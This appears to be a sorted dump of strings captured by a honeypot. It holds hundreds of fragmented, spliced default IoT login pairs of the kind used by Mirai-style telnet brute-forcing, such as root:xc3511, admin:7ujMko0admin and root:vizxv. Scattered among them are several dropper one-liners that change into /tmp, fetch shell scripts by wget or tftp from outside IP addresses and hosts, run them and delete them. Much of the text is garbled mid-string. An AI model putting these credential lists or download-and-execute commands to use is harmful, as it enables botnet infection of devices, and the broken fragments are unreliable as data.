
 
: 
. 
00 
1 
11 
:1111111 
1111111 
123 
18 
21 
4321 
45 
666666 
666666:66 
666666:6666:1111 
666666:666666 
666666:666666ll:sh 
666666:666666 sword 
666666:66666nable:system 
666666:6666ystem 
666666:666shell:sh 
666666:66ell:sh 
666666:66shell:sh 
666666:66system 
666666:66t:juantech 
666666:6able:system 
666666:ble:system 
666666hell:sh 
666666m 
666666:system 
66666tem 
666m 
666system 
66le:system 
6e:system 
6le:system 
8 
88 
8888 
88888 
888888: 
888888:888
888888:88882345 
888888:888888 
888888:8888883511 
888888:888888ll:sh 
888888:888888 nable:system 
888888:888888:smcadmin 
888888:888888ucker 
888888:88888e:system 
888888:88888min1234 
888888:8888ll:sh 
888888:8oot:juantech 
888888:admin 
888888:h 
8888enable:system 
8888sh 
8888tem 
888enable:system 
8system 
a 
a11 
aable:system 
aantech 
able:system 
ad 
ad1 
ad2345 
ad45 
adadmin:7ujMko0admin 
adble:system 
addmin:password 
adenable:system 
ade:system 
adhell:sh 
adle:system 
adll:sh 
adl:sh 
adm
adm 
adm111111 
admable:system 
admault 
admble:system 
admdmin1234 
Admem 
admenable:system 
adme:system 
admh 
admhell:sh 
admi
admi 
Admi
admiable:system 
admiadmin: 
admible:system 
admiell:sh 
admiem 
admih 
admiipc 
admill:sh 
admil:sh 
admim 
admin
admin 
admin:
admin: 
admin:: 
admin:1
admin:1111
admin:1111 
admin:11111 
admin:111111 
admin:1111111 
admin:1111111ell:sh 
admin:11111ot:xc3511 
admin:11111tem 
admin:1111ell:sh 
admin:1111l:sh 
admin:1111shell:sh 
admin:1111:system 
admin:1111 t: 
admin:111234 
admin:111ll:sh 
admin:111t:juantech 
admin:11888888 
admin:11:system 
admin:12 
admin:123 
:admin1234 
admin:1234 
admin:12345 
admin:123456 
admin:123456 1 
admin:123456l:sh 
admin:123456 pport 
admin:1234admin 
admin:1234hell:sh 
admin:1234 ll:sh 
admin:1234nable:system 
admin:1234 stem 
admin:1234ystem 
admin:123em 
admin:123ult 
admin:12h 
admin:12le:system 
admin:12m 
admin:12ord 
admin:12shell:sh 
admin:1ble:system 
admin:1em 
admin:1h 
admin:1hell:sh 
admin:1nable:system 
admin1:pa 
admin1:passoot:default 
admin1:passshell:sh 
admin1:passwo45 
admin1:passwohell:sh 
admin1:password 
admin1:password  
admin1:password : 
admin1:passwordlxx. 
admin1:passwordtor:meinsm 
admin1:passworll:sh 
admin1:poot:888888 
admin:1sh 
admin:1usybox VDOSS 
admin321 
admin:4321 
admin:4321ll:sh 
admin:432hell:sh 
admin:432:system 
admin:43m 
admin:4e:system 
admin:4shell:sh 
admin:5
admin:5 
admin::54321 
admin:54321 
admin:54321 888888 
admin:54321 root:dreambox 
admin:54321stem 
admin:54321:xc3511 
admin:5432h 
admin:5432ll:sh 
admin:54m 
admin:54tem 
admin:7root:xc3511 
admin:7:sh 
admin:7uadmin: 
admin:7uje:system 
admin:7ujM54321 
admin:7ujMko
admin:7ujMko0
admin:7ujMko0a
admin:7ujMko0ad 
admin:7ujMko0adhell:sh 
admin:7ujMko0adle:system 
admin:7ujMko0admble:system 
admin:7ujMko0admin 
admin:7ujMko0admin 88 
admin:7ujMko0admin t:Zte521 
admin:7ujMko0admle:system 
admin:7ujMko0tem 
admin:7ujMko888888 
admin:7ujMkoem 
admin:7ujMkom 
admin:88 
adminable:system 
Adminable:system 
admin:ad:888888 
admin:adem 
admin:admile:system 
admin:admim 
admin:admin1
admin:admin:1234 
admin:admin1234 
admin:admin1234  
admin:admin1234 dmin 
admin:admin1234 e:system 
admin:admin1234 ll:sh 
admin:admin1234ll:sh 
admin:admin1234 l:sh 
admin:admin1234n 
admin:admin1234root:12345 
admin:admin1234:smcadmin 
admin:admin123ble:system 
admin:admin123ell:sh 
admin:admin123shell:sh 
admin:admin123system 
admin:admin1r 
admin:adminem 
admin:adminenable:system 
admin:admine:system 
admin:adminh 
admin:admpport 
admin:adsh 
admin:ah 
admin:anko 
admin:a:system 
admin:at:vizxv 
admin:ech 
adminell:sh 
admin:em 
admine:system 
admin:h 
adminh 
adminhell:sh 
Admini 
admin:ipc 
Adminis 
adminisault 
Adminisenable:system 
Adminisinistrator:1234 
adminis:system 
Administ
Administem 
Administrable:system 
administraoot:default 
administratizxv 
Administratnable:system 
Administrato321 
Administratoem 
administratole:system 
Administratoll:sh 
administrator:12 
administrator:1234 
administrator:1234 1111 
administrator:1234ell:sh 
administrator:1234em 
administrator:1234hell:sh 
administrator:1234 mhdipc 
administrator:1234:sh 
administrator:1234 word 
administrator:123ker 
administrator:12nable:system 
administrator:1m 
administrator:1shell:sh 
Administrator:meindministrator:1234 
Administrator:meinin 
administrator:meinsm 
Administrator:meinsm 
Administrator:meinsmroot:xc3511 
Administrator:meinsm upport:support 
administratov 
administrt:xc3511 
admini:system 
admin:juantech 
adminjuantech 
adminle:system 
Adminle:system 
admin:ll:sh 
admin:l:sh 
adminl:sh 
adminm 
admin:me
admin:meinsadmin1234 
admin:meinsell:sh 
admin:meinsm 
admin:nko 
adminoot:xc3511 
admin:p 
admin:p511 
admin:P@55w0rd! 
admin:P@55w0rd!mhdipc 
admin:p8 
admin:pam 
admin:pas
admin:pashell:sh 
admin:pasll:sh 
admin:pasoot:juantech 
admin:pass 
admin:pass  
admin:passanko 
admin:passem 
admin:passervice 
admin:passh 
admin:passle:system 
admin:passll:sh 
admin:pass:sh 
admin:pass shell:sh 
admin:passshell:sh 
admin:passtem 
admin:passw 
admin:passw321 
admin:passwable:system 
admin:passwin:admin1234 
admin:passwoable:system 
admin:passwoem 
admin:passwohell:sh 
admin:password 
admin:password enable:system 
admin:password hell:sh 
admin:password ll:sh 
admin:passwordmbox 
admin:password ot:vizxv 
admin:passwordroot:default 
admin:passwordshell:sh 
admin:password t:support 
admin:passwore:system 
admin:passworm 
admin:passworshell:sh 
admin:passwot:default 
admin:passwot:vizxv 
admin:passwot:xc3511 
admin:passwshell:sh 
admin:passwtem 
admin:passystem 
admin:past:guest 
admin:pa:system 
admin:pasystem 
admin:paystem 
admin:pl:sh 
admin:pnable:system 
admin:ptem 
admin:pt:realtek 
adminroot:klv1234 
admin:root:xc3511 
admin:s 
admin:sem 
admin:sh 
admin:shell:sh 
admin:sm 
admin:smc 
admin:smcaadmin 
admin:smcad
admin:smcad 
admin:smcadm666:666666 
admin:smcadmi
admin:smcadmin 
admin:smcadmin ell:sh 
admin:smcadminll:sh 
admin:smcadmitem 
admin:smcadmt:xc3511 
admin:smcastem 
admin:smcem 
admin:smce:system 
admin:smcroot:xmhdipc 
adminstem 
admin:switstem 
admin::system 
adminsystem 
admin:tem 
admin:t:support 
admin:t:xc3511 
admin:ystem 
admiroot:jvbzd 
admish 
admistem 
admisystem 
admitem 
admit:xc3511 
admiystem 
adMko0admin 
admll:sh 
admnable:system 
admoot:7ujMko0admin 
admroot:dreambox 
admstem 
admsupport 
adm:system 
admt:klv1234 
admt:vizxv 
admzxv 
adroot:juantech 
adroot:vizxv 
adsh 
adstem 
ad:support 
adtem 
adystem 
Aell:sh 
aenable:system 
ae:system 
ahell:sh 
ale:system 
all:sh 
am 
amcadmin 
anko 
antech 
aot:xmhdipc 
aser:user 
ash 
ashell:sh 
astem 
aystem 
Binary file htrap matches
ble:system 
busybox wget || wget http://173.242.118.143/wbin3.242.118.143/wbin.sh; busybox tftp || tftp -g -r 173.242t || wget http://173.242.118.143/wbin.sh; busybox tftp || tftp -g -r 173.242.118.143 tbin1.sh; sh tbin1.sh || sh wh tbin1.sh || sh wbin.sh 
busybox wget || wget http://173.242.118.143/wbin.sh; busybox tftp || tftp -g -r 173.2| tftp -g -r 173.242.118.143 tbin1.sh; sh tbin1.sh || sh wbin.sh 
c3511 
cablecom:router 
cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var; tftp -r tftp.sh -g negein.sh; sh bin.sh; busybox wget http://neger.dingle.dog/bi| cd /mnt || cd /var; tftp -r tftp.sh -g neger1.dingle.don.sh; busybox wget http://neger.dingle.dog/bin1.sh; sh bi:sh 
ce 
ce:service 
ch 
d 
dmin 
:dreambox 
e
e 
e1 
e11 
e111 
e123 
e4321 
e45 
e666 
e888 
e888888 
eable:system 
eadmin:password 
eb 
eble:system 
ec 
ech 
edmin 
eell:sh 
eem 
eenable:system 
ee:system 
eh 
ehell:sh 
einsm 
ele:system 
ell:sh 
el:sh 
elt 
em 
en
en 
en: 
en. 
en1 
en11 
en1111 
en21 
en2345 
en321 
en4 
en54321 
en66 
en666666 
en6666:666666 
en7ujMko0vizxv 
en88888 
ena
ena 
ena1 
ena:1111 
ena2345 
ena3 
ena3511 
ena4 
ena45 
ena:54321 
enaable:system 
enaanko 
enaantech 
enab
enab 
enab11 
enab111 
enab54321 
enab66 
enab66666 
enabable:system 
enabadmin: 
enabadmin:12345 
enabadmin:password 
enabantech 
enabble:system 
enabell:sh 
enabem 
enabenable:system 
enabe:system 
enabh 
enabhell:sh 
enabin 
enabin:123456 
enabl
enabl 
enabl1 
enabl11 
enabl234 
enabl:54321 
enabl66 
enabl888888 
enablable:system 
enabladmin: 
enabladmin1:password 
enabladmin:meinsm 
enablble:system 
enablbusybox VDOSS 
enablc 
enable
enable 
enable:
enable: 
enable111 
enable1111 
enable:1234 
enable:2345 
enable:345 
enable:666666 
enable:666666:666666 
enable666666:666666 
enable:88 
enable:88888 
enable::888888 
enable:888888 
enable:8888:888888 
enable88888:888888 
enable:able:system 
enableable:system 
enableadmin:1111 
enable:admin1234 
enable:admin:12345 
enableadmin:12345 
enableadmin:password 
enable:anko 
enable:ble:system 
enableble:system 
enablech 
enable:dmin:1234 
enable:dmin:54321 
enable:dmin:meinsm 
enable:dmin:password 
enable:dmin:smcadmin 
enabledreambox 
enable:ell:sh 
enableell:sh 
enable:enable:system 
enableenable:system 
enable:e:system 
enablee:system 
enablefault 
enable:guest:12345 
enable:h 
enableh 
enablehell:sh 
enable:in 
enablein 
enable:in:54321 
enable:in:admin1234 
enable:jMko0vizxv 
enable:le:system 
enablele:system 
enable:ll:sh 
enablell:sh 
enable:l:sh 
enablel:sh 
enable:m 
enablem 
enablemin 
enablemin:1111111 
enable:min:123456 
enableministrator:meinsm 
enablemin:password 
enablen 
enablenable:system 
enable:n:password 
enableo0vizxv 
enable:oot:1111 
enable:oot:666666 
enable:oot:anko 
enable:oot:juantech 
enableoot:juantech 
enable:oot:klv123 
enableoot:pass 
enable:oot:system 
enable:oot:vizxv 
enable:ot: 
enableot:12345 
enable:ot:default 
enableot:hi3518 
enable:ot:user 
enable:ot:vizxv 
enableot:vizxv 
enableot:xc3511 
enableot:Zte521 
enable:port:support 
enableport:support 
enable:pport:support 
enablepport:support 
enableroot: 
enableroot:12345 
enableroot:54321 
enableroot:888888 
enableroot:default 
enable:root:juantech 
enableroot:vizxv 
enable:root:Zte521 
enabler:user 
enable:s
enable:s 
enable:s1 
enable:s:123456 
enable:s23 
enable:s3511 
enable:s:54321 
enable:s54321 
enable:s66 
enable:s666:666666 
enable:s88 
enable:sable:system 
enable:sadmin: 
enable:sadmin:4321 
enable:sault 
enable:sble:system 
enable:scadmin 
enable:s:default 
enable:sdmin: 
enable:sdministrator:1234 
enable:sdmin:smcadmin 
enable:sech 
enable:sell:sh 
enable:senable:system 
enable:ser 
enable:ser:user 
enable::sh 
enable:sh 
enablesh 
enable:shell 
enable:shell/busybox VDOSS 
enable:shell:sh 
enableshell:sh 
enable:sin: 
enable:sin:1111 
enable:sin:admin1234 
enable:sle:system 
enable:sl:sh 
enable:sm 
enable:sministrator:1234 
enable:smin:password 
enable:sn: 
enable:snable:system 
enable:sn:admin1234 
enable:sn:password 
enable:soot:pass 
enablesor 
enable:sor:meinsm 
enable:sort:support 
enable:sot:1111 
enable:sot:54321 
enable:sot:888888 
enable:sot:default 
enable:sot:juantech 
enable:sot:jvbzd 
enable:sot:pass 
enable:sot:vizxv 
enable:sot:xc3511 
enable:spassword 
enable:sport:support 
enable:sroot:default 
enable:sroot:klv123 
enable:srt:support 
enable:sser 
enable:ssh 
enable:sshell:sh 
enable:sstem 
enable:s:system 
enable:ssystem 
enable:st:1111 
enable:st:12345 
enable:st:54321 
enable:stem 
enablestem 
enable:stor:meinsm 
enable:st:system 
enable:st:vizxv 
enable:st:xc3511 
enable:st:xmhdipc 
enable::support 
enable:support:support 
enable:s:vizxv 
enable:sy
enable:sy 
enable:sy: 
enable:sy1111 
enable:sy:12345 
enable:sy12345 
enable:sy321 
enable:sy:54321 
enable:sy54321 
enable:sy666666 
enable:sy:888888 
enable:syable:system 
enable:syadmin 
enable:syadmin:1111 
enable:syadmin:smcadmin 
enable:syble:system 
enable:syc3511 
enable:syd 
enable:sy:default 
enable:sydmin:1111 
enable:syefault 
enable:syell:sh 
enable:syem 
enable:syenable:system 
enable:sye:system 
enable:syhell:sh 
enable:syh:tech 
enable:syinistrator:1234 
enable:syin:smcadmin 
enable:syko0vizxv 
enable:syle:system 
enable:sym 
enable:syn: 
enable:syn:1111111 
enable:syn:4321 
enable:synable:system 
enable:syn:password 
enable:syntech 
enable:synt:ubnt 
enable:syoot:888888 
enable:syoot:anko 
enable:syoot:default 
enable:syot: 
enable:syot:system 
enable:syot:vizxv 
enable:syot:xc3511 
enable:sy:pass 
enable:sypassword 
enable:syport:support 
enable:syrator:meinsm 
enable:syroot:dreambox 
enable:syr:user 
enable:sys
enable:sys 
enable:sys0000000 
enable:sys1111111 
enable:sys54321 
enable:sys666666 
enable:sys88888 
enable:sys:888888 
enable:sys888888 
enable:sysable:system 
enable:sysadmin:admin1234 
enable:sys:anko 
enable:sysble:system 
enable:sysbox 
enable:sysc3511 
enable:sysdipc 
enable:sysdmin: 
enable:sysdmin:1234 
enable:sysech 
enable:sysefault 
enable:sysell:sh 
enable:sysem 
enable:sysenable:system 
enable:syser:fucker 
enable:syse:system 
enable:sysh 
enable:sysh:/bin/busybox VDOSS 
enable:syshell:sh 
enable:syshi3518 
enable:sysin:pass 
enable:sysin:smcadmin 
enable:sysizxv 
enable:sysle:shell 
enable:sysle:system 
enable:sysll:sh 
enable:sysl:sh 
enable:syslv1234 
enable:sysm 
enable:sysmhdipc 
enable:sysmin:1111111 
enable:sysmin:12345 
enable:sysmin:password 
enable:sysmin:smcadmin 
enable:sysnable:system 
enable:sysnt:ubnt 
enable:sysoot:12345 
enable:sysoot:666666 
enable:sysoot:juantech 
enable:sysort:support 
enable:sysot: 
enable:sysot:12345 
enable:sysot:default 
enable:sys:pass 
enable:syspassword 
enable:sysrd 
enable:sys:realtek 
enable:sysrealtek 
enable:sysroot:vizxv 
enable:sysroot:xc3511 
enable:sysrt:support 
enable:sysr:user 
enable:sys:sh 
enable:syssh 
enable:sysshell:sh 
enable:syssmcadmin 
enable:sysstem 
enable:sys:system 
enable:syssystem 
enable:syst
enable:syst 
enable:syst: 
enable:syst11 
enable:syst:1111 
enable:syst:12345 
enable:syst12345 
enable:syst21 
enable:syst234 
enable:syst2345 
enable:syst345 
enable:syst3511 
enable:syst4321 
enable:syst:54321 
enable:syst7ujMko0admin 
enable:syst:7ujMko0vizxv 
enable:systable:system 
enable:systantech 
enable:systble:system 
enable:syst:default 
enable:systdefault 
enable:systdmin:1111111 
enable:syste
enable:syste 
enable:syste: 
enable:syste:00000000 
enable:syste0admin 
enable:syste1 
enable:syste111 
enable:syste1111 
enable:syste1234 
enable:syste321 
enable:syste345 
enable:syste4321 
enable:syste511 
enable:syste521 
enable:syste666 
enable:syste:666666 
enable:syste8888 
enable:syste:888888 
enable:systeable:system 
enable:systeadmin1234 
enable:syste:anko 
enable:systeantech 
enable:systeble:system 
enable:systecadmin 
enable:systedefault 
enable:systedipc 
enable:systedmin1234 
enable:systeefault 
enable:systeell:sh 
enable:systeem 
enable:systeenable:system 
enable:systeer 
enable:systeh 
enable:systehell:sh 
enable:syste:ikwb 
enable:systein 
enable:systein: 
enable:systeisor:supervisor 
enable:systejMko0admin 
enable:syste:juantech 
enable:systejuantech 
enable:systeko 
enable:systele:system 
enable:systell:sh 
enable:systel:sh 
enable:system
enable::system 
enable:system 
enable:system  
enable:system. 
enablesystem 
enable:system 1 
enable:system1 
enable:system 11 
enable:system11 
enable:system 111 
enable:system 11111 
enable:system11111 
enable:system 1:password 
enable:system321 
enable:system 3511 
enable:system 3518 
enable:system 45 
enable:system 5 
enable:system5 
enable:system 511 
enable:system511 
enable:system54321 
enable:system 56 
enable:system 66 
enable:system 66666 
enable:system7ujMko0vizxv 
enable:system 8888 
enable:system:888888 
enable:system 88888:888888 
enable:system able:system 
enable:systemable:system 
enable:system admin 
enable:systemadmin 
enable:systemadmin:123456 
enable:systemanko 
enable:system antech 
enable:system ble:system 
enable:systemble:system 
enable:system c3511 
enable:systemcadmin 
enable:system ch 
enable:system :default 
enable:system dmin1234 
enable:systemdmin1234 
enable:systemdmin:password 
enable:system ech 
enable:system ek 
enable:system ell:sh 
enable:systemell:sh 
enable:system em 
enable:systemem 
enable:system enable:system 
enable:systemenable:system 
enable:systemervisor:supervisor 
enable:systemest:12345 
enable:system e:system 
enable:systeme:system 
enable:system h 
enable:systemh 
enable:system hell:sh 
enable:systemhell:sh 
enable:systemin: 
enable:systemin:54321 
enable:system in.sh; busybox tftp || tftp -g -r 173.242.118.143 tbin1.sh; sh tbin1.sh || sh wbin.sh:busybox wget || wget http://st 
enable:systemin:smcadmin 
enable:system ko0vizxv 
enable:system le:system 
enable:systemle:system 
enable:system ll:sh 
enable:systemll:sh 
enable:system l:sh 
enable:systeml:sh 
enable:system m 
enable:systemmcadmin 
enable:system mhdipc 
enable:system min1234 
enable:systemmin1234 
enable:system min:12345 
enable:system min1:password 
enable:system nable:system 
enable:systemnable:system 
enable:systemn:admin1234 
enable:systemntech 
enable:system o0vizxv 
enable:systemoot: 
enable:system oot:888888 
enable:system oot:ikwb 
enable:systemoot:vizxv 
enable:system or:meinsm 
enable:system password 
enable:system pport 
enable:system r: 
enable:systemroot:54321 
enable:systemroot:xc3511 
enable:systemrvice 
enable:system ser:klv123 
enable:system :sh 
enable:system sh 
enable:system:sh 
enable:systemsh 
enable:system shell:sh 
enable:systemshell:sh 
enable:system ss 
enable:systemssword 
enable:system st 
enable:system stem 
enable:systemstem 
enable:system:support 
enable:systemsupport 
enable:system :system 
enable:system system 
enable:system:system 
enable:systemsystem 
enable:systemt: 
enable:systemt:54321 
enable:system t:888888 
enable:system t:default 
enable:systemtech 
enable:system tem 
enable:systemtem 
enable:system t:guest 
enable:systemtor:1234 
enable:system upport 
enable:system visor:supervisor 
enable:system :xmhdipc 
enable:system xv 
enable:system ystem 
enable:systemystem 
enable:system zd 
enable:systemzxv 
enable:systenable:system 
enable:systenko 
enable:systen:pass 
enable:systentech 
enable:systeor:supervisor 
enable:systeot:7ujMko0vizxv 
enable:systeot:juantech 
enable:systeot:vizxv 
enable:syster:fucker 
enable:syste:sh 
enable:systesh 
enable:systeshell:sh 
enable:systesor:supervisor 
enable:systestem 
enable:systesword 
enable:syste:system 
enable:systesystem 
enable:systet:default 
enable:systetech:tech 
enable:systetem 
enable:systet:xmhdipc 
enable:systeujMko0vizxv 
enable:systevbzd 
enable:systevisor:supervisor 
enable:systevizxv 
enable:systexc3511 
enable:systeystem 
enable:systezxv 
enable:systh 
enable:systhdipc 
enable:systhell:sh 
enable:syst:ikwb 
enable:systin:1111 
enable:systle:system 
enable:systll:sh 
enable:systm 
enable:systmhdipc 
enable:systn: 
enable:systn:54321 
enable:systnable:system 
enable:systn:password 
enable:systoot:54321 
enable:systoot:pass 
enable:systoot:xc3511 
enable:systoot:xmhdipc 
enable:systot:12345 
enable:systot:888888 
enable:systot:anko 
enable:systot:realtek 
enable:systot:xc3511 
enable:systot:xmhdipc 
enable:systpass 
enable:systport:support 
enable:systroot: 
enable:systroot:jvbzd 
enable:systser 
enable:syst:sh 
enable:systsh 
enable:systshell:sh 
enable:syststem 
enable:syst:system 
enable:systsystem 
enable:systt: 
enable:systt:666666 
enable:systtem 
enable:systt:realtek 
enable:systt:vizxv 
enable:systuantech 
enable:systujMko0admin 
enable:systupport:support 
enable:syst:user 
enable:syst:vizxv 
enable:systvizxv 
enable:systword 
enable:systystem 
enable:syst:Zte521 
enable:systzxv 
enable:sysujMko0admin 
enable:sysv123 
enable:sysword 
enable:sys:xc3511 
enable:sy:system 
enable:sysystem 
enable:syt:1111 
enable:syt:666666 
enable:syt:888888 
enable:syt:anko 
enable:syt:default 
enable:sytem 
enable:syther:fucker 
enable:syt:ikwb 
enable:syt:xmhdipc 
enable:syupport:support 
enable:syvizxv 
enable:sy:xc3511 
enable:syxc3511 
enable:sy:xmhdipc 
enable:syystem 
enable:syzxv 
enable:s:zlxx. 
enable:szxv 
enable:t:1111 
enable:t:12345 
enabletech:tech 
enable:tek 
enable:tem 
enabletem 
enable:t:klv1234 
enablet:support 
enablet:vizxv 
enable:t:xc3511 
enable:t:xmhdipc 
enable:upervisor:supervisor 
enable::xc3511 
enable:ystem 
enableystem 
enablh 
enablhell:sh 
enabljuantech 
enablle:system 
enablll:sh 
enabll:sh 
enablm 
enablmcadmin 
enablmother:fucker 
enablnable:system 
enabloot:54321 
enabloot:666666 
enabloot:888888 
enabloot:Zte521 
enablord 
enablr:meinsm 
enablroot:realtek 
enablroot:vizxv 
enabl:sh 
enablshell:sh 
enabl:system 
enablsystem 
enabltem 
enabltrator:1234 
enablv 
enablxc3511 
enablystem 
enabm 
enab:meinsm 
enabnable:system 
enabntech 
enaboot:54321 
enaboot:user 
enabort:support 
enabpass 
enabport 
enabroot:54321 
enabroot:default 
enabroot:xc3511 
enabrt 
enab:sh 
enabsh 
enabshell:sh 
enabstem 
enab:system 
enabtech 
enabtem 
enabuser:user 
ena/busybox VDOSS 
enabv123 
enabword 
enabystem 
enac3511 
enad 
ena:default 
enadipc 
enadmin1234 
enAdministrator:meinsm 
enaech 
enaell:sh 
enaenable:system 
enae:system 
enah 
enahell:sh 
enah:tech 
enain 
enak 
enale:system 
enall:sh 
enal:sh 
enalt 
enam 
enamin:smcadmin 
enaMko0vizxv 
enan1234 
enanable:system 
enao0vizxv 
enaoot: 
enaoot:default 
enaot: 
enaot:00000000 
enaot:xmhdipc 
ena:pass 
ena:password 
enaport 
enapport 
enar 
enaroot:system 
ena:sh 
enash 
enashell:sh 
enass 
enast 
ena:system 
enasystem 
enat 
enat:12345 
enatem 
enavizxv 
enaxc3511 
enaxv 
enaystem 
enble:system 
enc 
endmin:password 
enefault 
enell:sh 
enem 
enenable:system 
ene:system 
en:fucker 
enh 
enhell:sh 
enice 
enll:sh 
enl:sh 
enm 
ennable:system 
enoot:juantech 
enot:7ujMko0vizxv 
enot:xmhdipc 
enpassword 
enrt 
enS 
en:sh 
ensh 
enshell:sh 
enstem 
en:support 
en:system 
ensystem 
ent 
entech 
entem 
enuser 
en:xmhdipc 
enystem 
eoot:vizxv 
epc 
er:7ujMko0admin 
er:fucker 
eroot:xc3511 
ert:support 
ervice:service 
e:sh 
esh 
est:12345 
estem 
esupport:support 
e:system 
esystem 
et:00000000 
etem 
eubnt:ubnt 
e:xc3511 
eystem 
fucker 
g
g 
guel:sh 
gues
guesem 
guest
guest:
guest:12345 
guest:12345 ble:system 
guest:1234h 
guest:1234o0admin 
guest:1234ystem 
guest:123:sh 
guest:123ystem 
guest:1shell:sh 
guestadmin:password 
guest:gh 
guest:gue 
guest:gues
guest:guesh 
guest:gueshell:sh 
guest:guest
guest:guest 
guest:guest:12345 
guest:guestle:system 
guest:guest:sh 
guest:guhell:sh 
guest:gu:user 
guestm 
guesZte521 
gutem 
guystem 
gystem 
h 
hell:sh 
!!Huawei:@HuaweiHle:system 
ice:service 
inistrator:meinsm 
jMko0admin 
klv123 
le:system 
ll:sh 
login:password 
l:sh 
lt 
m 
mhdipc 
min 
min1234 
min:4321 
min:smcadmin 
mo
mo 
mohell:sh 
mother:f1234 
mother:fble:system 
mother:fuc
mother:fucke
mother:fucker 
mother:fucker l:sh 
mother:fuckshell:sh 
mother:fuystem 
mothe:system 
msystem 
n1234 
nable:system 
nko 
n:password 
n:smcadmin 
ntech 
o 
oot:vizxv 
oot:xmhdipc 
ord 
ort 
ort:support 
ot:666666 
ot:default 
ot:juantech 
pass 
pervisor 
port 
pport 
r
r 
r0admin 
r321 
r34 
r4 
r6666 
rable:system 
radministrator:1234 
radmin:radmin 
rble:system 
rbox 
rdmin:12345 
rdmin:pass 
rDOSS 
rell:sh 
renable:system 
rer:fucker 
re:system 
rko0vizxv 
rle:system 
rl:sh 
rm 
rnable:system 
rn:smcadmin 
ro
ro 
ro000000 
ro1 
ro3511 
roable:system 
roadmin:1111 
roble:system 
robox 
roch 
roell:sh 
roem 
roenable:system 
roest:12345 
roe:system 
roh 
rohell:sh 
roizxv 
role:system 
rol:sh 
rom 
romin:54321 
romin:meinsm 
ron1:password 
ronable:system 
ronetsmcadmin1234554321juantech1234123400000000001111111234555512345678qwerty123456789022221 
ron:meinsm 
roo
roo 
roo1 
roo:1111 
roo:1111111 
roo4321 
roo:7ujMko0admin 
roo:888888 
rooable:system 
rooble:system 
roodefault 
roodmin:12345 
rooell:sh 
rooe:system 
rooh 
roohdipc 
roohell:sh 
rooipc 
roole:system 
rooll:sh 
rool:sh 
roolt 
room 
roonable:system 
roooot:7ujMko0admin 
rooot:default 
rooot:vizxv 
rooot:xc3511 
roo:sh 
roosh 
rooshell:sh 
roost:12345 
roostem 
roo:system 
roosystem 
root
root 
root:
root:<> 
root: 
root:00 
root:0000000
root:0000000 
root:00000000 
root:00000000n:7ujMko0admin 
root:00000000 r 
root:0000000eambox 
root:000000nable:system 
root:00000tem 
root:000h 
root:0045 
root:00em 
root:0in:admin1234 
root:1 
root1 
root:1111 
root:1111able:system 
root:1111 enable:system 
root:1111 e:system 
root:1111 hell:sh 
root:1111 l:sh 
root:1111root:1111 
root:111ort 
root:111shell:sh 
root:111tem 
root:11hell:sh 
root:1234
root:12345 
root12345 
root:12345 able:system 
root:12345ell:sh 
root:12345enable:system 
root:12345 hell:sh 
root:12345hell:sh 
root:12345 ll:sh 
root:1234ell:sh 
root:1234ot:xmhdipc 
root:1234supervisor:supervisor 
root:123able:system 
root:12888888 
root:12ble:system 
root:12enable:system 
root:12hell:sh 
root:12shell:sh 
root:1h 
root:1ot:xc3511 
root:1ujMko0vizxv 
root:1word 
root321 
root4 
root:5
root:5 
root:54
root:5432
root:54321
root:54321 
root:54321  
root:54321111 
root:54321enable:system 
root:5432nable:system 
root:5432shell:sh 
root:543em 
root:543sh 
root:543shell:sh 
root:54hell:sh 
root:54:vizxv 
root:54ystem 
root:5:666666 
root:5ault 
root:5le:system 
root:5l:sh 
root:5up 
root:64 
root:66 
root:666
root:66666 
root:666666
root:666666 
root:666666 111 
root666:666666 
root:666666h 
root:666666 ice 
root:666666 shell:sh 
root:6666ll:sh 
root:666sh 
root:66l:sh 
root:6ble:system 
root:7345 
root:7hell:sh 
root:7in1234 
root:7:sh 
root:7uh 
root:7ujMem 
root:7ujMko0 
root:7ujMko0adm888 
root:7ujMko0admih 
root:7ujMko0admin 
root:7ujMko0admin  
root:7ujMko0admshell:sh 
root:7ujMko0vizhell:sh 
root:7ujMko0viz:system 
root:7ujMko0vizx
root:7ujMko0vizxv
root:7ujMko0vizxv 
root:7ujMko0vizxvvice:service 
root:7ujMko0vrd 
root:7ujMko:7ujMko0vizxv 
root:7ujMk:system 
root:7ujMkt:zlxx. 
root:7ule:system 
root:7u:sh 
root:7usystem 
root:7ystem 
root:88
root:888
root:888 
root:888888
root:888888 
root:888888  
root:88888888 
root:888888able:system 
root:888888ble:system 
root:888888ell:sh 
root:888888em 
root:888888 e:system 
root:888888 lv1234 
root:888888 shell:sh 
root:888888:system 
root:888888ystem 
root:88888admin:54321 
root:88888e:system 
root:88888ll:sh 
root:88888min 
root:88888nable:system 
root:88888smcadmin 
root:88888xv 
root:8888admin1234 
root:8888dmin:password 
root:8888hell:sh 
root:8888le:system 
root:8888:sh 
root:8888shell:sh 
root:888h 
root:888system 
root:888tem 
root:88ble:system 
root:88in:1111 
root:88l:sh 
root:88m 
root:8admin 
root:8ble:system 
root:8em 
root:8h 
root:8ll:sh 
root:8m 
root:8root:anko 
root:aable:system 
root: able:system 
root:able:system 
rootable:system 
root:admin 
root:admin: 
rootadmin 
rootadmin: 
root:administrator:1234 
root:an
root:an 
root:anenable:system 
root:anhell:sh 
root:aninistrator:1234 
root:ank
root:ank 
root:anko
root:anko 
root:anko 11 
root:anko66 
root:ankoin/busybox VDOSS 
root:ankole:system 
root:anko system 
root:anko:system 
root:ankosystem 
root:anko t:vizxv 
root:anko ujMko0vizxv 
root:an:sh 
root:anshell:sh 
root:ass 
root:assword 
root:astem 
root:asword 
root:ble:system 
rootcadmin 
root:d 
root:dd 
root:de
root:de 
root:def
root:def 
root:defa 
root:defahell:sh 
root:defapassword 
root:defa:sh 
root:defasystem 
root:defaul
root:defaulll:sh 
root:defaulrt 
root:defaulsupport 
root:default 
root:default ell:sh 
root:defaultell:sh 
root:defaulte:system 
root:default hell:sh 
root:defaultl:sh 
root:default sh 
root:default t:888888 
root:defaulystem 
root:defaushell:sh 
root:defaussword 
root:defaystem 
root:defm 
root:defnable:system 
root:defsupport 
root:dell:sh 
root:demcadmin 
root:deot:54321 
root:detem 
root:dmin 
root:dmin:admin1234 
root:dmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var; w lEJAK1V.sh; tftp -r tJNF55X.sh -g 185.47.62.44; sh tJNF5; rm -rf tJNF55X.sh FCn3zPT.sh lEJAK1V.sh:cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var; wget http:/h; tftp -r tJNF55X.sh -g 185.47.62.44; sh tJNF55X.sh; tft
root:drd 
root:dre
root:drea 
root:dreamble:system 
